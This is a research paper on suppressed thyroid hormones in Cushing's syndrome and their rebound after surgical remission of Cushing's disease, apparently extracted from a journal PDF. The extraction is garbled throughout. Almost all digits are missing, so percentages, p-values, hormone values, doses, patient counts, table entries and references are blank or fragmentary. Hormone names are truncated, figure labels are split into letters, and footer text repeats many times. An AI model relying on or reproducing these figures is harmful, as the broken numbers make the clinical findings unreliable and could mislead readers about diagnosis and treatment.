t , free t (ft ), t and free t (ft )) were measured in all cs at the time of diagnosis and in all cd  months after transsphenoidal pituitary tumor resection. postoperative hormone monitoring within  months was conducted in cd patients completing remission. twenty-eight remitted cd patients experienced hormone and antithyroid antibody evaluation preoperatively and on the rd, th and th month after surgery. results: tsh, t and ft were below the reference range in %, % and % of the cs patients. remitted cd patients ( / ) had significantly higher tsh (p =  . ), t (p =  . ) and ft (p =  . ) than those in the non-remission group ( / ). after remission of cd, tsh, t and ft showed a significant increase, with a few cases above the reference range. by  months, most cd patients’ thyroid functions returned to normal. thyroid hormones (including tsh, t and ft ) were negatively associated with serum cortisol levels both before and after surgery. no significant changes of antithyroid autoantibodies were observed. conclusions: tsh, t and ft are suppressed in endogenous hypercortisolemia. after remission of cd, tsh, t and ft increased significantly, even above the reference range, but returned to normal  year after surgery in most cases. antithyroid antibodies did not change significantly after remission of cd. introduction cushing’s syndrome (cs) comprises diverse manifestations resulting from chronic exposure to excess glucocorticoids. the incidence is . – . per million people per year. approximately % of endogenous cs is adrenocorticotrophin (acth)-dependent ( ), and % is acth-independent. pituitary corticotroph adenoma (cushing’s disease (cd)) is the most common cause ( ), followed by primary unilateral adrenal adenomas and ectopic adrenocorticotropic syndrome (eas). the clinical presentation includes reddish purple striae, - - key words f cushing’s syndrome f cushing’s disease f cortisol f thyroid hormones f antithyroid antibodies endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:yehongying@huashan.org.cn https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : plethora, proximal muscle weakness and metabolic disorders (central obesity, hypertension, diabetes mellitus and dyslipidemia). the inhibitory effect of hypercortisolemia on the hypothalamic–pituitary axis is most commonly characterized by menstrual abnormalities in adults and growth retardation in children. besides, the thyroid hormone changes in hypercortisolemia have been reported since . fredrickson  et  al. described that massive doses of cortisone acetate decreased iodine- (i ) accumulation in the thyroid of euthyroid patients ( ). dexamethasone administration ( mg daily for .  days) was reported to reduce the thyroid-stimulating hormone (tsh) and free t (ft ) secretion and blunted the tsh response to thyrotropin-releasing hormone (trh) ( ). regarding endogenous hypercortisolemia, a study of three patients with adrenal cs showed similar results ( ). kuku reported that serum tsh response to trh was impaired in eight patients with cd. the impairment was relieved after a pituitary implant of au ( ). primary cortisol deficiency was reported concomitant with high tsh and low ft . after cortisone administration, tsh returned to normal. however, serum cortisol and tsh showed no significant correlation ( ). in , tamada et al. first reported ‘hyperthyroidism’ in two cs patients after surgery due to ‘syndrome of inappropriate secretion of tsh’ (sitsh) associated with the insufficient replacement of hydrocortisone (hc) ( ). free t and tsh were normalized after a hc dose increase ( ). then, the same group investigated the clinical course in eight cs patients and found that free t levels were above the reference range in % of patients up to  months after surgery, and all returned to normal within   year ( ). they suggested that cured cs patients might develop high t or t with normal or elevated tsh ( ). endogenous cs is an uncommon disease. there has not yet been a large sample in which the clinical course of thyroid hormone changes was studied before and after remission of endogenous cs. in clinical practice, because of the lack of knowledge about this condition, some cs patients’ thyroid functions may be mistaken as evidence of hypothyroidism or hyperthyroidism after surgery and even led to the medication of antithyroid drugs. the aim of our study was to evaluate the thyroid functions of patients with cs, compare the hormone levels in patients with different etiologies, and investigate the clinical course of fluctuations of thyroid hormones in patients with cd pre- and postoperatively. patients and methods patients this study included cs patients who were hospitalized in the department of endocrinology and metabolism of huashan hospital between january and april . they were diagnosed with either cd (n = , median age: .   years, range –   years, female/male: / ), adrenal cs (n = , median age: .  years, range –  years, female/male: / ) or eas (n = , median age: .   years, range –   years, female/male: / ). all subjects had a comprehensive clinical evaluation by the same group of endocrinology specialists and all patients with cd underwent primary resection at our institution by the same surgeon. none of the patients had a history of thyroid diseases. methods data on clinical findings, laboratory findings, imaging findings, treatment and outcome were obtained. all cd patients (microadenomas: / , macroadenomas: / ) underwent transsphenoidal pituitary tumor resection (tss) through a microscope or endoscope. remission was defined as morning serum cortisol levels lower than . μg/dl within   days of selective tumor resection ( ). the cortisone replacement began after remission, and cortisone dosage prescribed was based on the serum cortisol levels and the symptoms. thyroid hormones (tsh, t , ft , t and free t (ft )) and serum cortisol were measured in all patients before treatment. in all cd patients, thyroid hormones and serum cortisol were measured   months after surgery. the hormones were measured before surgery and   day,  weeks,  month,  months and  months after surgery in nine cd patients completing remission. in remitted cd patients, the hormones and antithyroid autoantibodies were measured , and  months after surgery. hormonal assays samples were obtained at : h before any medication. serum thyroid hormones (tsh, t , ft , t and ft ) and antithyroid autoantibodies (tpo-ab and atg) were assessed by immunoenzymometric assay method (advia centaur®; siemens healthcare diagnostics inc.). serum cortisol was measured by chemiluminescent enzyme immunoassay (cobas® e , roche diagnostics). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : statistical analyses normal distributed continuous variables were expressed as mean values ± standard deviation (s.d.). t-test was used to compare means between groups. simple linear regression coefficients and multiple regression analysis were used to examine the correlation among parameters. spss . (spss) was used. a two-tailed p value < . was considered statistically significant. ethical approval the study was approved by the ethics committee of huashan hospital attached to fudan university (#ky - ). consent has been obtained from each patient or subject after full explanation of the purpose and nature of all procedures used. results at the time of diagnosis, tsh, t , ft , t and ft levels were below the reference range in %, %, %, % and % of cs patients, respectively (table  ). none of the patients had elevated thyroid hormones. in ( %) patients, low tsh with low t or t was found. regarding different etiologies, serum cortisol in patients with eas was higher than that in adrenal cs ( . ± . μg/dl vs . ± . μg/dl, p = . ) and cd ( . ± . μg/dl vs . ± . μg/dl, p = . ). ft and ft in eas were also the lowest, with significance when comparing with those in cd (ft : . ± . nmol/l vs . ± . pmol/l, p = . ; ft : . ± . nmol/l vs . ± . pmol/l, p = . ) (table  ). three months after surgery, / cd patients developed remission. the median dose of cortisone acetate for post-surgery and rd-month replacement treatment were separately . mg/day ( ~ mg/day) and . mg/day ( ~ . mg/day) in remission group. twenty of the remitted patients needed no more cortisone replacement on the third month. postoperative tsh ( . ± . miu/l vs . ± . miu/l, p = . ), t ( . ± . nmol/l vs . ± . nmol/l, p = . ), ft ( . ± . pmol/l vs . ± . pmol/l, p = . ), t ( . ± . nmol/l vs . ± . nmol/l, p = . ) were higher than those before surgery (fig.  and table  ). tsh in . % ( / ), t in . % ( / ) and ft in . % ( / ) were above the reference range   months after surgery in the remission group. however, ft slightly decreased after surgery (before surgery: . ± . pmol/l,   months after surgery: . ± . pmol/l, p = . ). moreover, elevated t , ft and ft with nonsuppressed tsh were seen in / ( . %) cases. we investigated the clinical parameters between the remission and non-remission groups (fig.  and table  ). before surgery, serum cortisol and thyroid hormones showed no difference between the two groups. however,   months after surgery, tsh (p = . ), t (p = . ) and ft (p = . ) became significantly higher in the remission group. t of the two groups showed no difference (p = . ). ft levels in the remission group were lower than those in the non-remission group ( . ± . pmol/l vs . ± . pmol/l, p = . ). correlation analyses between levels of serum cortisol and thyroid hormones were conducted in the cs patients before surgery and the cd patients  months after surgery. significant negative correlations between thyroid hormones and serum cortisol both before and after surgery were found (table  ). we also analyzed the correlations between tumor size and preoperative serum cortisol/thyroid functions in all the cd patients (n = ), but the association turned out insignificant. besides, the correlation among several parameters, including thyroid hormones, serum cortisol levels, age, gender, bmi and tumor size were analyzed using simple linear regression analysis (table  ). it revealed marked negative correlations between serum cortisol levels and thyroid function parameters including tsh (p = . ), t (p = . ) and ft (p = . ) before surgery. in addition, bmi was positively associated with t (p = . ) and ft (p = . ) and age were inversely associated with ft (p = . ) and ft (p = . ). however, after surgery, the only variable significantly affecting thyroid hormones was serum cortisol (in postoperative analyses, the variable ‘tumor size’ was excluded). for the nine remitted patients whose thyroid functions were closely monitored within   months, the table  characteristics of patients with cushing’s syndrome before treatment. cushing’s syndrome reference range number / age, years . ( . – . ) / female/male / / serum cortisol (µg/dl) . ( . – . ) / tsh (miu/l) . ( . – . ) . ~ . t (nmol/l) . ( . – . ) . ~ . t (nmol/l) . ( . – . ) . ~ . ft (pmol/l) . ( . – . ) . ~ . ft (pmol/l) . ( . – . ) . ~ . data are median (minimum–maximum). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : median dose of cortisone acetate for post-surgery, second week, first month, second month and third-month replacement treatment were . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day) and . mg/day ( ~ . mg/day). two of the nine patients received no cortisone replacement after surgery (fig.  ). among them, we found that tsh started to rise since the first day after surgery (the increase became statistically remarkable since the second week and the significance lasted till the third month). ft and t became lower on the first day and then rose up markedly. the changes of t and ft table  comparative study between cd, adrenal adenoma and eas. cd adrenal adenoma eas reference range n / age (years) . ( . , . ) . ( . , . ) . ( . , . ) / male/female / / / / serum cortisol (µg/dl) .  ±  . .  ±  . .  ±  . a / tsh (miu/l) .  ±  . .  ±  . .  ±  . . ~ . t (nmol/l) .  ±  . .  ±  . .  ±  . . ~ . t (nmol/l) .  ±  . .  ±  . .  ±  . . ~ . ft (pmol/l) .  ±  . b .  ±  . .  ±  . b . ~ . ft (pmol/l) .  ±  . b .  ±  . .  ±  . b . ~ . aserum cortisol of eas was significantly higher than that of adrenocortical adenoma (p =  . ) and cd (p =  . ). bft (p =  . ) and ft (p =  . ) in eas were significantly lower than those in cd. figure  comparison between remission (n =  ) and non-remission (n =  ) groups in cd patients before and  months after surgery. in the remission group, compared to those before surgery: serum cortisol level (a) dropped significantly; tsh (p =  . ), t (p =  . ), t (p =  . ) and ft (p =  . ) (panel (b, c, d and e)) showed significant increase; ft (f) slightly decreased after surgery (p =  . ). neither serum cortisol nor thyroid hormones showed notable difference before surgery between remission and non-remission group. three months after surgery, with the reduction of serum cortisol in remission group, tsh (b), t (c) and ft (e) became significantly lower than those in the non- remission group (p =  . for all three indexes). ft (f) levels in remission group were significantly lower than those in the non-remission group in the third month postoperative evaluation (p =  . ). the gray bands in panel (b, c, d, e and f) represent the reference range values. the lines represent mean values (±s.d.). *p <  . , **p <  . . before surgery months after surgery remission non-resmission se ru m co rt is ol (u g/ dl ) * * * * a remission non-resmission tt (n m ol /l ) * * * *c remission non-resmission ft (p m ol /l ) * * * * e remission non-resmission ts h (m iu /l ) * * * *b remission non-resmission tt (n m ol /l ) * * d remission non-resmission ft (p m ol /l ) f * * * this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : were not significant, except for ft ’s transient decrease on the second month. in the patients of the remission group undergoing -year follow-up (fig.  ), serum cortisol level markedly dropped after surgery. the median dose of cortisone acetate for post-surgery, rd-month, th-month and th-month replacement treatment were . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day), . mg/day ( ~ . mg/day) and mg/day ( ~ . mg/day). the proportion of patients receiving cortisone replacement for post-surgery day, rd month, th month and th month were . , . , . and . % separately. compared to those before surgery, tsh, t and ft showed constant significant increase postoperatively. elevated tsh above the reference range was found in two, four and three patients on the rd, th and th month. high t was seen in only three patients on the third month and then all returned to normal in the th- and th-month evaluation. abnormally elevated ft was seen in six patients on the rd month, two on the th month and then only one by   months. ft level dropped on the rd and th months but returned to no difference from the baseline level by   months. the alternation of t was not notable, with . % ( / ) of patients in the remission group constantly maintaining normal t level. overall tpo-ab and atg showed no significant change during the -year follow-up. discussion the changes of thyroid hormone in hypercortisolemia have been studied for   years. the results of previous studies were limited by small sample sizes and incomplete thyroid hormone indexes ( , ). we investigated thyroid function indexes (including tsh, t , t , ft and ft ) in cs patients, which, to date, was the largest sample. we found that in the cs patients, the incidence of low tsh, t and ft was relatively high (tsh, %; t , %; ft , %) before treatment. besides, none of the thyroid function indexes was above the reference range in active cs. in addition, this is also the first report comparing thyroid hormones among cd, adrenal cs and eas. we found that the levels of ft and ft in eas group, who bore the highest serum cortisol level, were lower than those in cd and adrenal cs. therefore, we recommend table  serum cortisol and thyroid functions of cd patients before and  months after surgery. remission group (n =  ) non-remission group (n =  ) pc pdbefore surgery  months after surgery pa before surgery  months after surgery pb serum cortisol (μg/dl) .  ±  . .  ±  . . .  ±  . .  ±  . . . . tsh (miu/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . t (nmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . t (nmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . ft (pmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . ft (pmol/l) .  ±  . .  ±  . . .  ±  . .  ±  . . . . acomparison between hormones before and  months after surgery in remission group. bcomparison between hormones before and  months after surgery in the non-remission group. ccomparison between remission and non-remission group before surgery. dcomparison between remission and non-remission group  months after surgery. table  correlations between serum cortisol and thyroid hormones. r p before surgery (n =  )a serum cortisol tsh − . d . t − . d . t − . c . ft − . d . ft − . d . three months after surgery (n =  )b serum cortisol tsh − . d . t − . d . t − . . ft − . d . ft . c . acorrelations between thyroid hormones and serum cortisol levels were analyzed in all the patients with cs (n =  ) before surgery. bcorrelations between thyroid hormones and serum cortisol levels were analyzed in all the patients with cd (n =  ) after surgery. cp <  . , dp <  . . this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : testing for cs in patients with low thyroid hormones and low tsh. in the cd patients, the remission group had higher tsh, t and ft levels than the non-remission group on the third month after surgery. in the remission group, . % ( / ) tsh, . % ( / ) t and . % ( / ) ft were above the reference range. moreover, . % ( / ) of patients in the remission group exhibited elevated thyroid hormones (t , ft and ft ) with nonsuppressed tsh. within the -month monitoring of the nine cd patients in remission group, we observed that tsh increased immediately  day after surgery and the increase started to exhibit significance since the second week postoperatively. t and ft levels went down   day after surgery and then rose up to markedly higher levels. clinicians should be careful not to misdiagnose these conditions as hyperthyroidism and we recommend testing for thyroid function after surgery in patients with cd. it is well known that glucocorticoids exert an inhibitory action on the hypothalamic–pituitary–thyroid axis ( , ). previous reports documented that glucocorticoids decreased the release of trh and tsh in the hypothalamic and pituitary ( , , , , , ), and increased type deiodinase (d ) activity, which was known to mainly convert t to t in the central nervous system, and eventually suppressed tsh and thyroid hormone (t and t ) secretion ( , ). the glucocorticoids also decreased type deiodinase (d ), known to convert serum t to t ( ), and that possibly explains the relatively normal t and ft concentrations in active cs. there have been few studies showing the correlation between serum cortisol and thyroid hormones ( ). in our study, we found significant negative correlations between thyroid hormones (tsh, t and ft ) and cortisol levels both before and after surgery. in the remission group, as the glucocorticoid concentration went down, tsh, t and ft increased significantly. tsh’s immediate increase after surgery was very likely to be caused by reduced d activity in the central nervous system. the mechanism of high t and ft might be the rise of tsh level and d activity in the periphery. a previous study reported elevated ft with unsuppressed tsh in cs patients   month after surgery ( ). they recruited eight patients and measured tsh, ft and ft only at st, rd, th and th month. our study included closer monitoring of patients’ thyroid function postoperatively and we found that tsh increased immediately after surgery. t and ft went down on the first day after surgery and then rose up notably. the transient decrease of t and ft may be explained by ‘low- t syndrome’ resulting from surgery stress. throughout our -year follow-up, t did not fluctuate as notably as tsh, t and ft did, and . % ( / ) of patients in the remission group constantly maintained normal t level. this may be due to increased conversion from t to t in the periphery. space-occupying lesion of the pituitary is the most common cause of central hypothyroidism, which is defined as low thyroid hormones in conjunction with a low or inappropriately normal tsh level. however, microadenomas are commonly thought unlikely to compromise pituitary functions ( ). as is known, microadenomas are quite common in cd. nestoras mathioudakis reported ( ) that the prevalence of central hypothyroidism was higher in acth micros ( %) compared with prolactin micros ( %) and nonfunctioning adenomas (nfas) ( %). nevertheless, they found no correlation between free t or tsh and the degree of hypercortisolism in that study. in our study, we found no correlation between tumor size and thyroid table  significant determinants of thyroid hormones in cd (n =  ) with variable parameters in multiple regression analysis. dependent variables independent variables unstandardized coefficients standardized coefficients p % cib beta before surgery tsh f − . − . . ( . , . ) t f − . − . . (− . , − . ) bmi . . . ( . , . ) ft f − . − . . (− . , − . ) age − . − . . (− . , − . ) bmi . . . ( . , . ) ft age − . − . . (− . , − . ) after surgery tsh f − . − . . (− . , − . ) t f − . − . . (− . , − . ) ft f − . − . . (− . , − . ) parameters analyzed included serum cortisol levels, bmi, gender, age and tumor size (in postoperative analyses, tumor size was excluded). f: serum cortisol. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : hormone/serum cortisol. marked correlations between thyroid hormones and serum cortisol were observed. all patients received transsphenoidal surgery at the same clinic by an experienced surgeon. therefore, we considered that the changes of thyroid hormones in cd were related to serum cortisol alternation, rather than surgery. normalization of hypercortisolism of cs is associated with the induction of autoimmunity ( ). some studies attributed the high tsh with/without low ft to exacerbation of underlying autoimmune disease along with the decline of serum cortisol concentration, sometimes accompanied by the increased titer of antithyroid antibodies ( , ). in our -year follow-up (n = ), tsh, t and ft levels significantly rose up after surgery in the remission group. ft levels decreased on the third and sixth months. moreover, in the hormone evaluation of all the cd patients (n = ), we found that ft in the remission group (n = ) became significantly lower after surgery. also, the postoperative ft in the remission group (n = ) was lower than that in the non- remission group (n = ) on the third month. this may be due to transiently increased conversion from t to t along with the disinhibition of d . furthermore, we find no significant fluctuation of anti-thyroperoxidase antibodies or antithyroglobulin antibodies by   year after surgery. therefore, for now, we hold the view that figure  changes in thyroid function in nine cd patients in the remission group within  months after surgery. serum cortisol (a) markedly dropped after surgery. panel (b) shows the daily doses of cortisone acetate within  months in the nine patients postoperatively. two of the nine patients received no cortisone replacement after surgery tsh (c), t (d), and ft (f) showed a significant increase. t (e) and ft (g) showed no significant change except for the ft ’s decrease on the second month. the gray bands in panels c, d, e, f and g represent the reference range values. the lines represent mean values (±s.d.) in panel (c, d, e, f and g). be fo re po st su rg er y w m m m se ru m co rt is ol (u g/ dl ) a po st su rg er y w m m m do se of co rt is on e ac et at e (m g/ d) b before d w m m m ts h (m iu /l ) p= . p= . p= . p= . c before d w m m m tt (n m ol /l ) p= . p= . p= . d p= . before d w m m m tt (n m ol /l ) e before d w m m m ft (p m ol /l ) p= . p= . p= . f before d w m m m ft (p m ol /l ) g p= . this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : high tsh with low ft after remission of cd is caused by the reduction of serum cortisol, and it should not be defined as primary hypothyroidism. however, as previous studies showed the elevation of thyroid autoantibodies could occur from the second month to the eighth year after surgery ( ), further follow-up should be needed for the thyroid autoantibodies to exhibit probable significant alternation. figure  changes in thyroid hormones, tsh and antithyroid autoantibodies in cd patients in the remission group by  months after surgery. serum cortisol (a) dropped immediately after surgery and then gradually increased. the median dose of cortisone acetate (b) for post-surgery, rd-month, th-month and th-month replacement treatment were .  mg/day, .  mg/day, .  mg/day and  mg/day. the proportion of patients receiving cortisone replacement for post-surgery day, rd month, th month and th month were . , . , . and . % separately. tsh (c), t (d) and ft (f) showed a significant increase in all the postoperative evaluation. ft (g) transiently decreased on the third and sixth month but returned to no difference from the baseline level by  months. t (e) and antithyroid autoantibodies did not change significantly by  months after surgery. the gray bands in panel (c, d, e, f, g, h and i) represent the reference range values. the lines respectively represent median (minimum–maximum) in panel (b), and mean values (±s.d.) in panel (a) and (c, d, e, f, g, h and i). before m m m se ru m co rt is ol (u g/ dl ) a p= . p= . p= . post surgery m m m da ily do se of co rt is on e ac et at e (m g/ d) b before m m m ts h (m iu /l ) c p= . p= . p= . before m m m tt (n m ol /l ) d p= . p= . p= . before m m m tt (n m ol /l ) e before m m m ft (p m ol /l ) f p= . p= . p= . before m m m ft (p m ol /l ) g p= . p= . before m m m tp o -a b (u /m l) h before m m m a tg (u /m l) i this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome : limitation the changes of thyroid functions of adrenal adenoma and eas after surgery were not elucidated. conclusion our study revealed the inhibitory action of endogenous hypercortisolemia on hypothalamic–pituitary–thyroid (hpt) axis, in which tsh, t and ft levels were suppressed. there were negative correlations between serum cortisol and thyroid hormones (tsh, t and ft ). after remission of cd, tsh, t and ft increased significantly, even above the reference range, and mostly returned to normal  year after surgery. the changes of thyroid hormones in cd were associated with serum cortisol alternation, not surgery. antithyroid antibodies showed no significant change after remission of cd. we recommend testing for cs in patients with low thyroid hormones and low tsh. in addition, post-treatment cd patients with high tsh and t should be carefully investigated so as not to be misdiagnosed with hyperthyroidism. the molecular mechanism of the changes of thyroid functions after remission of cd is not fully elucidated. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this research did not receive any specific grant from any funding agency in the public, commercial or not-for-profit sector. author contribution statement hongying ye designed the research; boni xiang, ran tao, xinhua liu, min he, xiaoming zhu, yiming li, zhenwei yao, yongfei wang, zengyi ma, and hongying ye diagnosed, treated, followed the patients; boni xiang, ran tao and hongying ye analyzed the data, wrote and edited the manuscript. acknowledgments the authors acknowledge the collaboration of the patients and all the doctors involved in the diagnosis and treatment. references nieman lk, biller bm, findling jw, newell-price j, savage mo, stewart pm & montori vm. the diagnosis of cushing’s syndrome: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) lacroix a, feelders ra, stratakis ca & nieman lk. cushing’s syndrome. lancet – . (https://doi.org/ . / s - ( ) - ) fredrickson ds, forsham ph & thorn gw. the effect of massive cortisone therapy on measurements of thyroid function. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jcem- - - ) re rn, kourides ia, ridgway ec, weintraub bd & maloof f. the effect of glucocorticoid administration on human pituitary secretion of thyrotropin and prolactin. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem- - - ) otsuki m, dakoda m & baba s. influence of glucocorticoids on trf- induced tsh response in man. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem- - - ) kuku sf, child df, nader s & fraser tr. thyrotrophin and prolactin responsiveness to thyrotrophin releasing hormone in cushing’s disease. clinical endocrinology – . (https://doi. org/ . /j. - . .tb .x) barnett ah, donald ra & espiner ea. high concentrations of thyroid-stimulating hormone in untreated glucocorticoid deficiency: indication of primary hypothyroidism? bmj – . (https://doi.org/ . /bmj. . . -a) tamada d, onodera t, kitamura t, yamamoto y, hayashi y, murata y, otsuki m & shimomura i. hyperthyroidism due to thyroid-stimulating hormone secretion after surgery for cushing’s syndrome: a novel cause of the syndrome of inappropriate secretion of thyroid-stimulating hormone. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) tamada d, kitamura t, onodera t, hamasaki t, otsuki m & shimomura i. clinical significance of fluctuations in thyroid hormones after surgery for cushing’s syndrome. endocrine journal – . (https://doi.org/ . /endocrj.ej - ) nieman lk, biller bm, findling jw, murad mh, newell-price j, savage mo, tabarin a & endocrine society. treatment of cushing’s syndrome: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) estupina c, belmar j, tapiaarancibia l, astier h & arancibia s. rapid and opposite effects of dexamethasone on in vivo and in vitro hypothalamic somatostatin release. experimental brain research – . (https://doi.org/ . /bf ) nakagawa k, ishizuka t, shimizu c, ito y & wakabayashi i. increased hypothalamic somatostatin messenger-rna following dexamethasone administration in rats. acta endocrinologica – . (https://doi.org/ . /acta. . ) cintra a, fuxe k, wikstrom ac, visser t & gustafsson ja. evidence for thyrotropin-releasing-hormone and glucocorticoid receptor- immunoreactive neurons in various preoptic and hypothalamic nuclei of the male-rat. brain research – . (https://doi. org/ . / - ( ) - ) kakucska i, qi yp & lechan rm. changes in adrenal status affect hypothalamic thyrotropin-releasing-hormone gene-expression in parallel with corticotropin-releasing hormone. endocrinology – . (https://doi.org/ . /endo. . . ) perez-martinez l, carreon-rodriguez a, gonzalez-alzati me, morales c, charli jl & joseph-bravo p. dexamethasone rapidly regulates trh mrna levels in hypothalamic cell cultures: interaction with the camp pathway. neuroendocrinology – . (https://doi.org/ . / ) alkemade a, unmehopa ua, wiersinga wm, swaab df & fliers e. glucocorticoids decrease thyrotropin-releasing hormone messenger ribonucleic acid expression in the paraventricular nucleus of the human hypothalamus. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://doi.org/ . /bmj. . . -a https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /endocrj.ej - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /bf https://doi.org/ . /acta. . https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://doi.org/ . /endo. . . https://doi.org/ . / https://doi.org/ . /jc. - https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com b xiang, r tao et al. thyroid functions in cushing’s syndrome pb– : chiamolera mi & wondisford fe. minireview: thyrotropin- releasing hormone and the thyroid hormone feedback mechanism. endocrinology – . (https://doi.org/ . / en. - ) coppola a, meli r & diano s. inverse shift in circulating corticosterone and leptin levels elevates hypothalamic deiodinase type in fasted rats. endocrinology – . (https://doi. org/ . /en. - ) kitahara h, imai y, yamauchi k, tomita a & mizuno s. pituitary- thyroid function in patients with cushing’s syndrome – comparative study before and after extirpation of adrenal cortex tumor. nihon naibunpi gakkai zasshi – . (https://doi.org/ . / endocrine . . _ ) freda pu, beckers am, katznelson l, molitch me, montori vm, post kd, vance ml & endocrine society. pituitary incidentaloma: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) mathioudakis n, thapa s, wand gs & salvatori r. acth-secreting pituitary microadenomas are associated with a higher prevalence of central hypothyroidism compared to other microadenoma types. clinical endocrinology – . (https://doi.org/ . / j. - . . .x) da mota f, murray c & ezzat s. overt immune dysfunction after cushing’s syndrome remission: a consecutive case series and review of the literature. journal of clinical endocrinology and metabolism e –e . (https://doi.org/ . /jc. - ) sahoo jp, selviambigapathy j, kamalanathan s, nagarajan k & vivekanandan m. effect of steroid replacement on thyroid function and thyroid autoimmunity in addison’s disease with primary hypothyroidism. indian journal of endocrinology and metabolism – . (https://doi.org/ . / - . ) niepomniszcze h, pitoia f, katz sb, chervin r & bruno od. primary thyroid disorders in endogenous cushing’s syndrome. european journal of endocrinology – . (https://doi.org/ . / eje. . ) received in final form june accepted july accepted preprint published online july this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /endocrine . . _ https://doi.org/ . /endocrine . . _ https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /j. - 